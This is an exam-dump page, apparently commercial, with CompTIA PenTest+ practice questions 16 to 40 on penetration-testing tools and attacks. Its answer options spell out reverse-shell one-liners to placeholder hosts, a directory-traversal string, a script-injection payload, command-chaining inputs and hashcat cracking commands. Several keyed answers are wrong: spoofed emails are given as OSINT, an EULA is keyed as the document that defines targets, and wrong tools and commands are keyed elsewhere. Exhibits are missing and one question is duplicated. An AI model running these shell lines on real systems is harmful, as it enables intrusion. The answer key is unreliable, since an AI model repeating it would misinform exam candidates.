New 2021 Guaranteed Success with ActualTorrent PT0-001 Dumps CompTIA PDF Questions
Exceptional Practice To CompTIA PenTest+ Certification Exam Pass the First Time
NEW QUESTION 16
Click the exhibit button.
A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network Which of the following types of attacks should the tester stop?
- A. ARP spoofing
- B. SNMP brute forcing
- C. SMTP relay
- D. DNS cache poisoning
Answer: A
NEW QUESTION 17
Which of the following is an example of a spear phishing attack?
- A. Targeting an organization with a watering hole attack
- B. Targeting random users with a USB key drop
- C. Targeting an executive with an SMS attack
- D. Targeting a specific team with an email attack
Answer: D
Explanation:
Reference:
https://www.comparitech.com/blog/information-security/spear-phishing/
NEW QUESTION 18
A penetration tester is connected to a client's local network and wants to passively identify cleartext protocols and potentially sensitive data being communicated across the network. Which of the following is the BEST approach to take?
- A. Run a stress test.
- B. Run a network vulnerability scan.
- C. Run an MITM attack.
- D. Run a port scan.
Answer: C
Explanation:
Explanation/Reference: https://www.sciencedirect.com/topics/computer-science/encrypted-protocol
NEW QUESTION 19
A consultant is attempting to harvest credentials from unsecure network protocols in use by the organization.
Which of the following commands should the consultant use?
- A. John
- B. nc
- C. Hashcat
- D. Tcmpump
Answer: D
NEW QUESTION 20
A penetration tester reviews the scan results of a web application.
Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
- A. Expired certificate
- B. Stored XSS
- C. Clickjacking
- D. Fill path disclosure
Answer: B
Explanation:
References https://www.owasp.org/index.php/Top_10_2010-A2-Cross-Site_Scripting_(XSS)
NEW QUESTION 21
A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for the penetration tester to take?
- A. Visit the client and use impersonation to obtain information from staff.
- B. Search the Internet for information on staff such as social networking sites.
- C. Send spoofed emails to staff to see if staff will respond with sensitive information.
- D. Obtain staff information by calling the company and using social engineering techniques.
Answer: C
NEW QUESTION 22
A penetration tester has identified a directory traversal vulnerability. Which of the following payloads could have helped the penetration tester identify this vulnerability?
- A. || is /tmp/
- B. "><script>document.location=/root/</script>
- C. && dir C:/
- D. ../../../../../../../../
- E. 'or 'folder' like 'file'; --
Answer: D
Explanation:
Explanation
Explanation/Reference: https://www.sciencedirect.com/topics/computer-science/directory-traversal
NEW QUESTION 23
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikazt. Which of the following registry changes would allow for credential caching in memory?
A)
B)
C)
D)
- A. Option A
- B. Option D
- C. Option B
- D. Option C
Answer: B
NEW QUESTION 24
A penetration tester, who is not on the client's network. is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the command:
nmap 100.100/1/0-125
Which of the following commands would be BEST to return results?
- A. nmap 100.100.1.0-125 -T4
- B. nmap -sV -oA output 100.100.10-125
- C. nmap -Pn -sT 100.100.1.0-125
- D. nmap -sF -p 100.100.1.0-125
Answer: C
NEW QUESTION 25
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).
- A. Install an intrusion prevention system.
- B. Implement two-factor authentication for remote access.
- C. Prevent members of the IT department from interactively logging in as administrators.
- D. Increase password complexity requirements.
- E. Install a security information event monitoring solution.
- F. Mandate all employees take security awareness training.
- G. Upgrade the cipher suite used for the VPN solution.
Answer: A,F,G
NEW QUESTION 26
A client asks a penetration tester to add more addresses to a test currently in progress. Which of the following would defined the target list?
- A. Statement of work
- B. Rules of engagement
- C. Master services agreement
- D. End-user license agreement
Answer: D
NEW QUESTION 27
DRAG DROP
A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all
Answer:
Explanation:
NEW QUESTION 28
If a security consultant comes across a password hash that resembles the following b117 525b3454 7Oc29ca3dBaeOb556ba8 Which of the following formats is the correct hash type?
- A. SHA-1
- B. NetNTLMvl
- C. NTLM
- D. Kerberos
Answer: A
NEW QUESTION 29
A tester has captured a NetNTLMv2 hash using Responder Which of the following commands will allow the tester to crack the hash using a mask attack?
- A. hashcat -m 5600 -r rulea/beat64.rule hash.txt wordliat.txt
- B. hashcat -m 5600 -o reaulta.txt hash.txt wordliat.txt
- C. hashc&t -m 5600 -a 3 haah.txt ?a?a?a?a?a?a?a?a
- D. hashcax -m 500 hash.txt
Answer: C
NEW QUESTION 30
A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an administrator should have access.
Which of the following controls would BEST mitigate the vulnerability?
- A. Add client-side security controls
- B. Prevent directory traversal.
- C. Sanitize all the user input.
- D. Implement authorization checks.
Answer: D
NEW QUESTION 31
Which of the following commands starts the Metasploit database?
- A. msfconsole
- B. db_init
- C. msfvenom
- D. db_connect
- E. workspace
Answer: A
Explanation:
Explanation
References: https://www.offensive-security.com/metasploit-unleashed/msfconsole/
NEW QUESTION 32
A penetration tester compromises a system that has unrestricted network access over port 443 to any host.
The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
- A. nc -e /bin/sh <SOURCEIP> 443
- B. ssh superadmin@<DESTINATIONIP> -p 443
- C. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;
- D. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1
Answer: D
Explanation:
Explanation/Reference: https://hackernoon.com/reverse-shell-cf154dfee6bd
NEW QUESTION 33
During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?
- A. Medusa
- B. Responder
- C. Ettercap
- D. Tcpdump
Answer: A
NEW QUESTION 34
A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all
Answer:
Explanation:
Explanation
1.) NIST
2.) NSRT
3.) imdA
4.) TRAT
NEW QUESTION 35
A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
A)
B)
C)
D)
- A. Option A
- B. Option D
- C. Option B
- D. Option C
Answer: B
NEW QUESTION 36
Black box penetration testing strategy provides the tester with:
- A. privileged credentials
- B. source code
- C. a network diagram
- D. a target list
Answer: D
Explanation:
Explanation
References: https://www.scnsoft.com/blog/fifty-shades-of-penetration-testing
NEW QUESTION 37
A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:
- A. Directory traversal
- B. User enumeration
- C. Remote file inclusion
- D. Cross-site scripting
Answer: B
NEW QUESTION 38
Which of the following tools is used to perform a credential brute force attack?
- A. John the Ripper
- B. Hashcat
- C. Peach
- D. Hydra
Answer: A
Explanation:
Explanation
Reference
https://www.greycampus.com/blog/information-security/brute-force-attacks-prominent-tools-totackle- such-attacks
NEW QUESTION 39
A penetration tester ran an Nmap scan against a target and received the following output:
Which of the following commands would be best for the penetration tester to execute NEXT to discover any weaknesses or vulnerabilities?
- A. onesixtyone -d 192.168.121.1
- B. snmpwalk -c public 192.168.121.1
- C. enum4linux -w 192.168.121.1
- D. medusa -h 192.168.121.1 -U users.txt -P passwords.txt -M ssh
Answer: B
NEW QUESTION 40
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
- A. dsquery user -inactive 3
- B. dsquery -o -rdn -limit 21
- C. dsuser -name -account -limit 3
- D. dsrm -users "DN=company.com; OU=hq CN=users"
Answer: B
NEW QUESTION 41
......
PT0-001 EXAM DUMPS WITH GUARANTEED SUCCESS: https://www.actualtorrent.com/PT0-001-questions-answers.html